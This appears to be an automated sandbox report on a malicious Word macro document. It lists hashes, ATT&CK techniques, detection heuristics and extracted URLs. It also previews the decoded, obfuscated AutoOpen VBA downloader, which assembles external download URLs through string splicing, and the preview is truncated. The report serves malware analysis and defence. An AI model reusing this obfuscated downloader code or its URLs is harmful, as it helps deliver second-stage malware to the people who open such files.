Office (OLE) malware analysis — malicious · 46acbdf64873613d

MALICIOUS

Office (OLE)

255.0 KB Created: 2017-12-12 12:25:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: cad31e09a016fe6cdae36cc948ba3f58 SHA-1: 6a5f7b22c1b24325f10057e57a01b9b0e05726e4 SHA-256: 46acbdf64873613dceff0d9d5af2169ef6af5b71576a312d3cd2320bc2ca4f34

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. This macro, identified as an AutoOpen macro, is designed to execute code. The script concatenates strings to form a URL, specifically 'demotas+t', which is likely used to download and execute a second-stage payload. The presence of the 'Password-protected archive handoff' heuristic further suggests that the document may be a lure to trick users into opening a password-protected archive, which often contains malware.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://demotas+t In document text (OLE body)
- http://qch.ge/cx8yyu/,httwMf+wMfp://wMf+wMfwwwtas+tas.lisettas+Z5ZaN7Q26abHmjZj6373Z5In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 94041 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	94041 bytes
SHA-256: `877a2a63a80350bb37120c559e552d4652b34ac7271320e52dfe3f02dd953545`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "nMiGwQaoHIk" Function mnrnpILAXQp() JnzDDoB = ("SQvjvwoGF" + "ZtnYKloS" + "JXVaptfYUDuj" + "TWnQQBvHDJhM" + "KadNwNfKr" + "wqGqQXTDKaqZQk") + ("UmWiFNoOajFvGG" + "DZcbqZKLfjjG" + "lYkJsTbbIf" + "hIbfGLcMwiWR" + "ptUKbrvWHRcBzv" + "nfFutru") TnDDRvJvVYG = ("mOzALft" + "SwuFThMFEQQQ" + "PAPtCOTwBczYY" + "uZiqIbfVjXMmir" + "QauzKXNkHJRZo" + "VuhvkRjaZ") + ("oNtRrjPf" + "HlBFbNZjoWh" + "CqENdirzZJpBm" + "zdwtatlz" + "fUpGhLlrDrPm" + "oDNBYiCzwA") PtKcQ = Mid("O9zRMft'+'as+tas MCVtas+tas_.E'+'xcept'+'iiV0amIwK9", 5, 38) NzwHjH = ("wiETGXKsPHnT" + "wRzRjPZrwiHPZZ" + "YbXGvLWfW" + "owzYNtMcDo" + "FdJbUrzAz" + "jwsTnjh") + ("ncmdtvQbSl" + "vnWkDTwNiaUW" + "ZTHAEEaJfDQ" + "bcjOLsYN" + "BRKNpAoWC" + "SFGEanPWNLaQjF") ELHXK = ("bwEsQdmnSPwfmq" + "mOdAQONc" + "zNLFENnFo" + "CJLWGSB" + "rNjrzMpvOzpzjO" + "qvDSjiFbrq") + ("nzbsXhOTWOhF" + "zQIwqPoWn" + "UbDAUMlmpAPYp" + "WaHlMsFIpp" + "QaHlbBNAK" + "RTjtHkc") iDdCNWNswka = ("crPwShvIQX" + "znPElnc" + "zGUXIbw" + "LColhFpNJZ" + "kPXwqjYqcH" + "ZnodISHT") + ("XWMkGbm" + "swCuLQrpaJ" + "qjlTOBcAwEw" + "FqTzODnqOu" + "wdFPOXw" + "iJdcWmCwidapQ") tzPATIEn = Mid("U50Rlljt0vXS2SVwSPdrMwlRontas+t'+'as.Message;tas+tas}}ta'+'s)'+'.RepLAcEwMf+wMf(ta'+'s907tawcia8Ap", 25, 68) zckBqTAK = ("FwaanbQHDKujM" + "NhEmiBNwCYiO" + "GbrFIdP" + "rrpmfUTwDFbu" + "FwpUFaiGvCv" + "VJjLFmFwBW") + ("OAwjuAzSDUaAc" + "kCCkdvo" + "MJLmmzTWzdjIaU" + "ukGwksFv" + "DJUjCLXa" + "UopVHNB") BZAXAs = ("cziUVDJnZGUYm" + "kVwqiimJhw" + "AjbYzTW" + "wLioCLskkdV" + "OOQdRmSz" + "BSQjTVWhPam") + ("zqKFjwiqzBfLqm" + "QwHNAYwusOIj" + "VCUDjJQXFXkpo" + "izmEpjjF" + "INlZzvSrXNnV" + "jcchWOLaWXMRUu") mziVtqII = ("hWwRUcPvIAXzEB" + "NBidcjT" + "GIHFjRZdsvlK" + "zrjjFnuLAbwS" + "bTYkYPNkpJMX" + "iiXiESqWNKww") + ("vZaFjKmwqG" + "IWWzwJi" + "JWJMoVXibK" + "IZnBToKjc" + "lkncTWh" + "tYDbbmAmNmkIjK") cAaNzMj = Mid("IzO6f9wi9BvQz9zQrjas+tasMCVoCbMvb8NMKkz0fMUMi", 19, 9) zokTbhnM = ("JTCHPTM" + "zkRcmfNcAljTK" + "IJVuIlpYHiA" + "iEKjFbUmi" + "FlZuIvMjlbujKs" + "UKaAYcmbZzJR") + ("fHwXwLEjVN" + "uMbtZSBtRuk" + "tmFTSKzzz" + "sAdcXiwoCzw" + "FMBtCGvQAZurFl" + "rmZVQdRUbPwvT") iucSs = ("tfjWrzSzGZ" + "RdinYcKcFOwNc" + "pubuRRBXsj" + "ZEwGWFzzKafI" + "wBPCFHw" + "GCBFqDoIr") + ("lzFwXOWiIzQRsK" + "XzPBwSlkPTBu" + "jCLoThu" + "wziAjWzz" + "pJrTTFY" + "tbANqfVU") JTrpcFSLq = ("dslTwjtSYIsBjc" + "FmXmpHBdi" + "TosaiFLcVWj" + "XIEzZORc" + "uoAVcYIdn" + "PHncsArtChY") + ("FmvPPiqhm" + "BQZArEBh" + "wiuRCjf" + "whUOvrji" + "aNJanFpDF" + "DsJnsUiZfK") OCHKDbZGuz = Mid("cttp://luizmatas+tasss'+'oterapetas+taswM'+'f+wMfuta.tas+t'+'ascom.tas+tasbrtas+tas/tas+tasvtas+taZlhjwi6XhW0I1IuRls", 2, 97) fLCpu = ("CFmbwLPaYA" + "BRvlkNdrChMz" + "haFuzIRIjLUt" + "aqwcsvEn" + "bjOccBd" + "opIAuXGVc") + ("jdUGbsYmn" + "aoRszbzZfVjPiP" + "ilMjTrGPfV" + "lUFWEpOk" + "zXQASYhqHjTzF" + "wGLGTBTYmWpq") RobrHLiR = ("IwSwlzwzL" + "oFDhKWqU" + "ZzfvJciYzXC" + "ONuKszjil" + "hZMMPSRlZG" + "smSdDIUDYBcJua") + ("IXRYKqrERGizM" + "HLzwSVbch" + "pMbMUFPSmXJuU" + "vIBiAXU" + "HnRpiNbE" + "fpbjwPfkM") ZtNMjO = ("TJQqAuXXGUM" + "uKQIwCKfl" + "PtjviXbl" + "LbuNjrsSFhMpmw" + "YqDQpUfKsLtXH" + "LAvVaBm") + ("zjQEjFw" + "TdurWrTKwZ" + "QBBmTkNtjQU" + "zFYtTzkk" + "MTrQcQjThk" + "BVWzvwzTWL") QLRXrw = Mid("jiJGUZ31dVPuIVMOZL2-'+'con'+'tent/thtas'+'+tasemes/stas+tasctas+tashulerrozzi/vXltas+tas0'+'kcytas+9zzEdZ2Y", 20, 80) wKoUohKDf = ("QKpGNrwAJUtcK" + "dEnviaCqiH" + "EsRwtWwnjEA" + "jDziMSjXD" + "GFubjFmnZci" + "JzfEPwupdRc") + ("HrjrqYwkaZmL" + "SmsBtiY" + "EuwDIDlcOBpc" + "TrYuzBiz" + "kMTBwLB" + "kmECCzhohVMHM") zljHsVjw = ("jhSdTVwPL" + "UKdTfLz" + "VhSjiidzYho" + "lzfKVNlnX" + "CaTwSwNhs" + "tRTfAzwkzVw") + ("bwPUfTwSa" + "CIfsNmQf" + "qpNTUjAJVOBn" + "QnzVjzT" + "jZzhOKzImMTUlF" + "NfuofJdDZY") FnzHJbWF = ("zivwuUGvdu" + "CKljGGaaaRCY" + "RuqGPjR" + "p ... (truncated)

SHA-256: 877a2a63a80350bb37120c559e552d4652b34ac7271320e52dfe3f02dd953545

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nMiGwQaoHIk"
Function mnrnpILAXQp()
JnzDDoB = ("SQvjvwoGF" + "ZtnYKloS" + "JXVaptfYUDuj" + "TWnQQBvHDJhM" + "KadNwNfKr" + "wqGqQXTDKaqZQk") + ("UmWiFNoOajFvGG" + "DZcbqZKLfjjG" + "lYkJsTbbIf" + "hIbfGLcMwiWR" + "ptUKbrvWHRcBzv" + "nfFutru")
TnDDRvJvVYG = ("mOzALft" + "SwuFThMFEQQQ" + "PAPtCOTwBczYY" + "uZiqIbfVjXMmir" + "QauzKXNkHJRZo" + "VuhvkRjaZ") + ("oNtRrjPf" + "HlBFbNZjoWh" + "CqENdirzZJpBm" + "zdwtatlz" + "fUpGhLlrDrPm" + "oDNBYiCzwA")
PtKcQ = Mid("O9zRMft'+'as+tas MCVtas+tas_.E'+'xcept'+'iiV0amIwK9", 5, 38)
NzwHjH = ("wiETGXKsPHnT" + "wRzRjPZrwiHPZZ" + "YbXGvLWfW" + "owzYNtMcDo" + "FdJbUrzAz" + "jwsTnjh") + ("ncmdtvQbSl" + "vnWkDTwNiaUW" + "ZTHAEEaJfDQ" + "bcjOLsYN" + "BRKNpAoWC" + "SFGEanPWNLaQjF")
ELHXK = ("bwEsQdmnSPwfmq" + "mOdAQONc" + "zNLFENnFo" + "CJLWGSB" + "rNjrzMpvOzpzjO" + "qvDSjiFbrq") + ("nzbsXhOTWOhF" + "zQIwqPoWn" + "UbDAUMlmpAPYp" + "WaHlMsFIpp" + "QaHlbBNAK" + "RTjtHkc")
iDdCNWNswka = ("crPwShvIQX" + "znPElnc" + "zGUXIbw" + "LColhFpNJZ" + "kPXwqjYqcH" + "ZnodISHT") + ("XWMkGbm" + "swCuLQrpaJ" + "qjlTOBcAwEw" + "FqTzODnqOu" + "wdFPOXw" + "iJdcWmCwidapQ")
tzPATIEn = Mid("U50Rlljt0vXS2SVwSPdrMwlRontas+t'+'as.Message;tas+tas}}ta'+'s)'+'.RepLAcEwMf+wMf(ta'+'s907tawcia8Ap", 25, 68)
zckBqTAK = ("FwaanbQHDKujM" + "NhEmiBNwCYiO" + "GbrFIdP" + "rrpmfUTwDFbu" + "FwpUFaiGvCv" + "VJjLFmFwBW") + ("OAwjuAzSDUaAc" + "kCCkdvo" + "MJLmmzTWzdjIaU" + "ukGwksFv" + "DJUjCLXa" + "UopVHNB")
BZAXAs = ("cziUVDJnZGUYm" + "kVwqiimJhw" + "AjbYzTW" + "wLioCLskkdV" + "OOQdRmSz" + "BSQjTVWhPam") + ("zqKFjwiqzBfLqm" + "QwHNAYwusOIj" + "VCUDjJQXFXkpo" + "izmEpjjF" + "INlZzvSrXNnV" + "jcchWOLaWXMRUu")
mziVtqII = ("hWwRUcPvIAXzEB" + "NBidcjT" + "GIHFjRZdsvlK" + "zrjjFnuLAbwS" + "bTYkYPNkpJMX" + "iiXiESqWNKww") + ("vZaFjKmwqG" + "IWWzwJi" + "JWJMoVXibK" + "IZnBToKjc" + "lkncTWh" + "tYDbbmAmNmkIjK")
cAaNzMj = Mid("IzO6f9wi9BvQz9zQrjas+tasMCVoCbMvb8NMKkz0fMUMi", 19, 9)
zokTbhnM = ("JTCHPTM" + "zkRcmfNcAljTK" + "IJVuIlpYHiA" + "iEKjFbUmi" + "FlZuIvMjlbujKs" + "UKaAYcmbZzJR") + ("fHwXwLEjVN" + "uMbtZSBtRuk" + "tmFTSKzzz" + "sAdcXiwoCzw" + "FMBtCGvQAZurFl" + "rmZVQdRUbPwvT")
iucSs = ("tfjWrzSzGZ" + "RdinYcKcFOwNc" + "pubuRRBXsj" + "ZEwGWFzzKafI" + "wBPCFHw" + "GCBFqDoIr") + ("lzFwXOWiIzQRsK" + "XzPBwSlkPTBu" + "jCLoThu" + "wziAjWzz" + "pJrTTFY" + "tbANqfVU")
JTrpcFSLq = ("dslTwjtSYIsBjc" + "FmXmpHBdi" + "TosaiFLcVWj" + "XIEzZORc" + "uoAVcYIdn" + "PHncsArtChY") + ("FmvPPiqhm" + "BQZArEBh" + "wiuRCjf" + "whUOvrji" + "aNJanFpDF" + "DsJnsUiZfK")
OCHKDbZGuz = Mid("cttp://luizmatas+tasss'+'oterapetas+taswM'+'f+wMfuta.tas+t'+'ascom.tas+tasbrtas+tas/tas+tasvtas+taZlhjwi6XhW0I1IuRls", 2, 97)
fLCpu = ("CFmbwLPaYA" + "BRvlkNdrChMz" + "haFuzIRIjLUt" + "aqwcsvEn" + "bjOccBd" + "opIAuXGVc") + ("jdUGbsYmn" + "aoRszbzZfVjPiP" + "ilMjTrGPfV" + "lUFWEpOk" + "zXQASYhqHjTzF" + "wGLGTBTYmWpq")
RobrHLiR = ("IwSwlzwzL" + "oFDhKWqU" + "ZzfvJciYzXC" + "ONuKszjil" + "hZMMPSRlZG" + "smSdDIUDYBcJua") + ("IXRYKqrERGizM" + "HLzwSVbch" + "pMbMUFPSmXJuU" + "vIBiAXU" + "HnRpiNbE" + "fpbjwPfkM")
ZtNMjO = ("TJQqAuXXGUM" + "uKQIwCKfl" + "PtjviXbl" + "LbuNjrsSFhMpmw" + "YqDQpUfKsLtXH" + "LAvVaBm") + ("zjQEjFw" + "TdurWrTKwZ" + "QBBmTkNtjQU" + "zFYtTzkk" + "MTrQcQjThk" + "BVWzvwzTWL")
QLRXrw = Mid("jiJGUZ31dVPuIVMOZL2-'+'con'+'tent/thtas'+'+tasemes/stas+tasctas+tashulerrozzi/vXltas+tas0'+'kcytas+9zzEdZ2Y", 20, 80)
wKoUohKDf = ("QKpGNrwAJUtcK" + "dEnviaCqiH" + "EsRwtWwnjEA" + "jDziMSjXD" + "GFubjFmnZci" + "JzfEPwupdRc") + ("HrjrqYwkaZmL" + "SmsBtiY" + "EuwDIDlcOBpc" + "TrYuzBiz" + "kMTBwLB" + "kmECCzhohVMHM")
zljHsVjw = ("jhSdTVwPL" + "UKdTfLz" + "VhSjiidzYho" + "lzfKVNlnX" + "CaTwSwNhs" + "tRTfAzwkzVw") + ("bwPUfTwSa" + "CIfsNmQf" + "qpNTUjAJVOBn" + "QnzVjzT" + "jZzhOKzImMTUlF" + "NfuofJdDZY")
FnzHJbWF = ("zivwuUGvdu" + "CKljGGaaaRCY" + "RuqGPjR" + "p
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.